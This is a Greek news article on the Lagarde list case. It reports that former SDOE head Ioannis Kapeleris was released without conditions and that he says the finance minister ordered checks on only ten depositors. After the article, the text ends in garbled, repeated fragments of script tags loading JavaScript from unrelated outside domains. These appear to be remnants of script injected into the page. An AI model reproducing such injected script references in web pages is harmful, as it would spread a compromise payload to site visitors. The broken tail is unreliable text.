Ελεύθερος χωρίς όρους ο Ι. Καπελέρης για τη λίστα Λαγκάρντ

Ελεύθερος χωρίς όρους ο Ι. Καπελέρης για τη λίστα Λαγκάρντ

Ελεύθερος χωρίς την επιβολή οιουδήποτε περιοριστικού όρου αφέθηκε μετά την απολογία του στους ειδικούς ανακριτές που χειρίζονται την υπόθεση της λίστας Λαγκάρντ ο πρώην επικεφαλής του ΣΔΟΕ, Ιωάννης Καπελέρης.

Η κατηγορία την οποία κλήθηκε να αντικρούσει ο κ. Καπελέρης αφορά στο κακούργημα της απιστία στην υπηρεσία καθώς φέρεται να μην διενήργησε έλεγχο για τους 2.062 μεγαλοκαταθέτες της επίμαχης λίστας.

Απολογούμενος ενώπιον των ανακριτών για θέματα διαφθοράς, Ι. Παπακώστα και Δημ. Καβαλάρη, ο πρώην επικεφαλής του ΣΔΟΕ, επανέλαβε πως πήρε εντολή από τον τότε υπουργό Οικονομικών Γ. Παπακωνσταντίνου , να ελέγξει το φορολογικό προφίλ μόνο 10 ονομάτων που περιλαμβάνονταν στη λίστα Λαγκάρντ και πως ουδέποτε πήρε εντολή να κάνει φορολογικό έλεγχο.

Μάλιστα όπως τόνισε στη σύσκεψη που πραγματοποιήθηκε στις 24 Ιανουαρίου 2011 με τη συμμετοχή και του τότε υπουργού ο ίδιος ο κ. Παπακωνσταντίνου τους είπε ότι θα γίνει έλεγχος αλλά θα τους ενημερώσει εκείνος για το ποιά υπηρεσία θα τον διεξάγει.
Ειδικότερα ο κατηγορούμενος στο υπόμνημα που κατέθεσε δια των συνηγόρων του Μαρίας Παπαμιχαλοπούλου και Γιάννη Μαντζουράνη , υποστήριξε ότι «δεν έλαβε ποτέ εντολή από τον υπουργό για να κάνει φορολογικό έλεγχο κανενός προσώπου. Έλαβε εντολή να ελέγξει το φορολογικό προφίλ 10 και μόνον προσώπων με μεγάλες καταθέσεις στο εξωτερικό χωρίς να του γνωστοποιηθεί το ποσό των καταθέσεων και το όνομα της τράπεζας.
Επίσης δεν του αναφέρθηκε ποτέ η ύπαρξη ή όχι λίστας καταθέτων. Λίγες μέρες μετά έγινε σύσκεψη στο υπουργείο Οικονομικών παρουσία του υπουργού και άλλων υπηρεσιακών παραγόντων όπου εκεί για πρώτη φορά άκουσε για την ύπαρξη της λίστας Λαγκάρντ. Εκεί αποφασίστηκε να ελεγχθούν όλα τα ονόματα της σχετικής λίστας. Ο υπουργός όμως είπε ότι θα αποφασίσει ποιά υπηρεσία θα διενεργήσει τον έλεγχο , αν θα είναι το ΣΔΟΕ, ειδικά κλιμάκια ελέγχου ή η εφορία μεγάλου πλούτου. Τον Μάρτιο του 2011 αποχώρησε από το ΣΔΟΕ χωρίς να του έχει δοθεί καμία εντολή σχετικά με το θέμα αυτό».

Αύριο πρόκειται να απολογηθεί ο έτερος πρώην επικεφαλής του ΣΔΟΕ Ιωάννης Διώτης έπειτα από τη σημερινή προθεσμία που του χορηγήθηκε λόγω κωλύματος στο πρόσωπο του συνηγόρου υπεράσπισης του.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >